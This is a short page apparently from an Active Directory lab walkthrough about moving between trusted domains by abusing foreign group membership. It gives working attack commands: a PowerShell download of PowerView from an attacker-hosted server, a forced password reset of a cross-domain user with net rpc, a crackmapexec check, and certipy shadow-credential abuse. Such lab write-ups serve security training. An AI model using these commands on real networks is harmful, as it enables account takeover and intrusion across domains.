Foreign group and users

On bloodhound we can see very easily that there is link between the domains with the following query (Careful this query is fine in a lab but this will certainly be a little too heavy in a real world AD)

NewYork.Local

North.NewYork.Local

Maryland.Local

On the lab you will find some specifics groups to pass from one domain to the other.
As you already have done the acl part previously you will easily find the way to exploit that.
newyork.local to maryland.local: group KGB
To do that just pick a user from the RadioCity and exploit with the KGB group

RDP

xfreerdp /d:newyork.local /u:diego.montenegro /p:letsdothis /v:192.168.56.10 /cert-ignore

Loading PowerView.ps1 to ParrotOS Lab Machine

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1

Uploading it to the Windows Server

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PowerView.ps1', 'C:\Users\diego.montenegro\Documents\PowerView.ps1')

Get-NetGroupMember -Identity "KGB" -Domain Maryland.local

Change Teresa PWD

net rpc password teresa.Perez -U newyork.local/diego.montenegro%letsdothis -S baltimore.maryland.local
Enter new password for teresa.Perez: <here we enter Password123>

And verify

crackmapexec smb 192.168.56.12 -u teresa.Perez -p 'Password123' -d maryland.local

We can also to that with shadow credentials (but the auto will not work here, we will have to do that with two steps)

certipy shadow add -u diego.montenegro@newyork.local -p 'letsdothis' \
 -dc-ip 192.168.56.12 -target baltimore.maryland.local -account 'teresa.perez'

certipy auth -pfx teresa.perez.pfx -username teresa.perez -domain maryland.local -dc-ip 192.168.56.12

Maryland to NewYork : group MainMultiDoms

In the same way we can exploit the Maryland to NewYork foreign group

PreviousForest Trust (newyork.local -> maryland.local)NextUse unconstrained delegation

Last updated 2 years ago